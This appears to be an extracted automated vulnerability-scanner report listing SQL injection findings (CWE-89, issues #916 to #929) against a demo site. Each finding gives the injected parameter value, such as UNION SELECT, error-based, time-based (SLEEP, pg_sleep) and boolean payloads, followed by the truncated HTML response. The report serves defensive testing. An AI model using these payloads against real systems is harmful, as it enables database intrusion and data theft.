href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #916\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #917\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(\n0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,\nFLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #918\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #919\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR 1=0#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #920\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #921\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'^'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #922\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #923\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #924\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #925\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR x=x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #926\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ') or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #927\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #928\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 1083=1083 AND (1427=1427\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #929\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR x=y\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 